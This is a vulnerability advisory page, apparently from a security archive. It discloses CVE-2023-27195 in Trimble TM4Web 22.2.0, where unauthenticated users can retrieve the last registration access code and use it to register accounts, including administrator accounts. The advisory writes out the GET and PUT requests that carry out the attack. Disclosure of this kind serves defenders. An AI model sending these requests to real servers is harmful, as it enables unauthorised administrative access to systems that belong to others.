Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Trimble TM4Web 22.2.0 Privilege Escalation / Access Code Disclosure[6]
- Authored by Clement Cruchet[7]
-
An access control issue in Trimble TM4Web version 22.2.0 allows unauthenticated attackers to access a specific crafted URL path to retrieve the last registration access code and use this access code to register a valid account. If the access code was used to create an Administrator account, attackers are also able to register new Administrator accounts with full rights and privileges.
- advisories | CVE-2023-27195[8]
- SHA-256 |
f463a33e91d671de7054018540aff6f6ec53938dedf239b9646be10f49edfccf
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
CVE ID: CVE-2023-27195
Description:
An access control issue in Trimble TM4Web v22.2.0 allows
unauthenticated attackers to access a specific crafted URL path to
retrieve the last registration access code and use this access code to
register a valid account. If the access code was used to create an
Administrator account, attackers are also able to register new
Administrator accounts with full rights and privileges.
Vulnerability Type: Broken Access Control
Vendor of Product: Trimble - Transportation
(https://transportation.trimble.com/products/TM4Web)
Affected Product Code Base: TM4Web v22.2.0
Affected Component: User registration process
Attack Type: Remote
Impact: Privilege escalation / authentication bypass
Attack Vectors:*1. Accessing the last access code *
GET /inc/tm_ajax.msw?func=UserfromUUID&uuid=
Host: example.host.com
*2. Sending PUT request to create a new user account with previously
retrieved access code*
PUT /inc/tm_ajax.msw
Host: example.host.com [...]
WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. &LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser
Discoverer: Clément Cruchet (lutzenfried)
References:
- Official website: https://transportation.trimble.com/products/TM4Web
File Tags
- ActiveX[19] (933)
- Advisory[20] (84,747)
- Arbitrary[21] (16,645)
- BBS[22] (2,859)
- Bypass[23] (1,826)
- CGI[24] (1,032)
- Code Execution[25] (7,630)
- Conference[26] (689)
- Cracker[27] (844)
- CSRF[28] (3,373)
- DoS[29] (24,535)
- Encryption[30] (2,383)
- Exploit[31] (52,793)
- File Inclusion[32] (4,251)
- File Upload[33] (986)
- Firewall[34] (822)
- Info Disclosure[35] (2,846)
- Intrusion Detection[36] (906)
- Java[37] (3,118)
- JavaScript[38] (889)
- Kernel[39] (7,007)
- Local[40] (14,711)
- Magazine[41] (586)
- Overflow[42] (13,034)
- Perl[43] (1,430)
- PHP[44] (5,197)
- Proof of Concept[45] (2,368)
- Protocol[46] (3,695)
- Python[47] (1,599)
- Remote[48] (31,404)
- Root[49] (3,617)
- Rootkit[50] (522)
- Ruby[51] (619)
- Scanner[52] (1,650)
- Security Tool[53] (7,978)
- Shell[54] (3,247)
- Shellcode[55] (1,217)
- Sniffer[56] (900)
- Spoof[57] (2,258)
- SQL Injection[58] (16,531)
- TCP[59] (2,423)
- Trojan[60] (689)
- UDP[61] (897)
- Virus[62] (668)
- Vulnerability[63] (32,572)
- Web[64] (9,866)
- Whitepaper[65] (3,773)
- x86[66] (967)
- XSS[67] (18,170)
- Other[68]
File Archives
- April 2024[69]
- March 2024[70]
- February 2024[71]
- January 2024[72]
- December 2023[73]
- November 2023[74]
- October 2023[75]
- September 2023[76]
- August 2023[77]
- July 2023[78]
- June 2023[79]
- May 2023[80]
- Older[81]
Systems
- AIX[82] (429)
- Apple[83] (2,078)
- BSD[84] (376)
- CentOS[85] (58)
- Cisco[86] (1,927)
- Debian[87] (7,003)
- Fedora[88] (1,693)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,467)
- HPUX[91] (880)
- iOS[92] (373)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (49,145)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (488)
- RedHat[101] (15,446)
- Slackware[102] (941)
- Solaris[103] (1,611)
- SUSE[104] (1,444)
- Ubuntu[105] (9,424)
- UNIX[106] (9,388)
- UnixWare[107] (187)
- Windows[108] (6,647)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]